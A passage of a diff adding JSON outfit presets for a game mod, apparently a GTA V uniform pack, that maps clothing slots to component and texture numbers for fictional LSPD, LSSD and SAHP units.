+"Decal": "12:1", +"UnderCoat": "3:1", +"Pants": "91:3", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "75:1" + }, + { +"Name": "Female LSPD K-9 Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "94:1", +"UpperSkin": "10:1", +"Decal": "15:1", +"UnderCoat": "3:1", +"Pants": "91:3", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "75:1" + }, + { +"Name": "Male METRO Div Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "102:2", +"UpperSkin": "5:1", +"Decal": "13:1", +"UnderCoat": "95:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male METRO Div Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "103:2", +"UpperSkin": "12:1", +"Decal": "16:1", +"UnderCoat": "95:1", +"Pants": "87:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female METRO Div Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "93:2", +"UpperSkin": "4:1", +"Decal": "12:1", +"UnderCoat": "102:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female METRO Div Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "102:1", +"Top": "94:2", +"UpperSkin": "15:1", +"Decal": "15:1", +"UnderCoat": "102:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSPD Riot Gear", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "92:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "108:1", +"Top": "151:10", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "126:7", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "21:1", +"Parachute": "21:1" + }, + { +"Name": "Female LSPD Riot Gear", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "92:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "108:1", +"Top": "148:8", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "34:1", +"Pants": "132:7", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "24:1", +"Parachute": "21:1" + }, + { +"Name": "Male LSPD SWAT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "151:1", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "186:1", +"Top": "221:1", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "93:1", +"Pants": "32:1", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSPD SWAT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSPD", +"Hat": "150:1", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "186:1", +"Top": "231:1", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "104:6", +"Pants": "31:1", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "14:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:3", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "14:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:3", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:2", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:1" + }, + { +"Name": "Female LSSD Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "6:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:2", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:2" + }, + { +"Name": "Male LSSD Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "31:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:2", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "280:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:2", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:2", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "26:1", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:2", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:2", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "42:2", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:2", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Motorcycle Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:3", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Motorcycle Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:3", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Motorcycle Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:3", +"UpperSkin": "27:1", +"Decal": "1:1", +"UnderCoat": "39:2", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Motorcycle Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:3", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Motorcycle Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:3", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Female LSSD Motorcycle Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "18:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:3", +"UpperSkin": "29:1", +"Decal": "1:1", +"UnderCoat": "52:2", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "54:1" + }, + { +"Name": "Male LSSD Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "136:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:14", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:8", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "38:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "135:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:14", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "32:2", +"Pants": "90:8", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Bicycle Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "50:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "95:3", +"UpperSkin": "20:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "13:2", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Bicycle Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "48:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "86:3", +"UpperSkin": "32:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "15:4", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Harbor Patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "95:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "88:8", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "9:3", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Harbor Patrol", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "86:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "66:1", +"Pants": "91:8", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "10:3", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:2", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:16", +"Pants": "23:4", +"Shoes": "21:1", +"Accessories": "1:1", +"Armor": "24:2", +"Parachute": "69:1" + }, + { +"Name": "Male LSSD Business Casual", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:17", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "23:4", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "24:2", +"Parachute": "1:1" + }, + { +"Name": "Male LSSD Crime Scene Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:2", +"UpperSkin": "94:2", +"Decal": "1:1", +"UnderCoat": "180:16", +"Pants": "23:4", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "24:2", +"Parachute": "30:8" + }, + { +"Name": "Male LSSD Armor Protection", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "33:2", +"Mask": "1:1", +"Top": "293:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:5", +"Pants": "23:4", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "24:2", +"Parachute": "1:1" + }, + { +"Name": "Male LSSD Raid Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:2", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:16", +"Pants": "23:4", +"Shoes": "21:1", +"Accessories": "7:1", +"Armor": "18:4", +"Parachute": "61:2" + }, + { +"Name": "Male LSSD Plain Clothes", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:2", +"Mask": "1:1", +"Top": "209:17", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "5:2", +"Shoes": "64:5", +"Accessories": "7:1", +"Armor": "24:2", +"Parachute": "1:1" + }, + { +"Name": "Male LSSD Gang Detail Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:2", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "102:18", +"Pants": "5:2", +"Shoes": "64:5", +"Accessories": "7:1", +"Armor": "18:4", +"Parachute": "61:2" + }, + { +"Name": "Male LSSD Gang Detail Armor", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "136:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:3", +"Mask": "122:1", +"Top": "74:19", +"UpperSkin": "152:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "5:2", +"Shoes": "64:5", +"Accessories": "7:1", +"Armor": "8:2", +"Parachute": "52:2" + }, + { +"Name": "Female LSSD Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:4", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "105:6", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "26:2", +"Parachute": "69:1" + }, + { +"Name": "Female LSSD Business Casual", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "358:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:2", +"Parachute": "1:1" + }, + { +"Name": "Female LSSD Crime Scene Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:2", +"UpperSkin": "106:2", +"Decal": "1:1", +"UnderCoat": "105:6", +"Pants": "4:64", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:2", +"Parachute": "1:1" + }, + { +"Name": "Female LSSD Armor Protection", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "367:13", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "162:5", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:2", +"Parachute": "1:1" + }, + { +"Name": "Female LSSD Raid Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:2", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "218:13", +"Pants": "4:64", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "22:4", +"Parachute": "61:2" + }, + { +"Name": "Female LSSD Plain Clothes", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:2", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "6:10", +"Shoes": "63:24", +"Accessories": "7:1", +"Armor": "26:2", +"Parachute": "69:1" + }, + { +"Name": "Female LSSD Gang Detail Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:2", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "58:2", +"Pants": "6:10", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "22:4", +"Parachute": "61:2" + }, + { +"Name": "Female LSSD Gang Detail Armor", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "135:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:2", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "82:2", +"Pants": "6:10", +"Shoes": "63:24", +"Accessories": "7:1", +"Armor": "30:5", +"Parachute": "1:1" + }, + { +"Name": "Male LSSD K-9 Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "136:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:2", +"UpperSkin": "5:1", +"Decal": "12:1", +"UnderCoat": "54:1", +"Pants": "88:8", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "66:2" + }, + { +"Name": "Male LSSD K-9 Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "136:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:2", +"UpperSkin": "12:1", +"Decal": "2:1", +"UnderCoat": "54:1", +"Pants": "88:8", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "66:2" + }, + { +"Name": "Female LSSD K-9 Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "135:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:2", +"UpperSkin": "4:1", +"Decal": "11:1", +"UnderCoat": "32:2", +"Pants": "91:8", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:2" + }, + { +"Name": "Female LSSD K-9 Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "135:23", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:2", +"UpperSkin": "10:1", +"Decal": "2:1", +"UnderCoat": "32:2", +"Pants": "91:8", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:2" + }, + { +"Name": "Male LSSD Dirtbike patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "17:2", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "153:2", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "56:1", +"Pants": "68:11", +"Shoes": "48:4", +"Accessories": "2:1", +"Armor": "19:2", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Dirtbike Unit", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "17:2", +"Glasses": "28:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:2", +"UpperSkin": "19:1", +"Decal": "1:1", +"UnderCoat": "33:1", +"Pants": "70:11", +"Shoes": "49:4", +"Accessories": "2:1", +"Armor": "23:2", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD SWAT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "151:2", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:3", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "104:1", +"Pants": "32:2", +"Shoes": "36:1", +"Accessories": "111:1", +"Armor": "26:3", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD SWAT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "150:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:3", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "104:3", +"Pants": "31:2", +"Shoes": "37:1", +"Accessories": "82:1", +"Armor": "28:3", +"Parachute": "49:1" + }, + { +"Name": "Male LSSD Pilot Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "80:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:2", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "44:2", +"Pants": "65:2", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSSD Pilot Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "79:1", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:2", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "31:1", +"Pants": "67:2", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male SAHP Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "32:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "31:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "42:3", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "42:3", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:5", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "42:3", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:5" + }, + { +"Name": "Male SAHP Jacket", 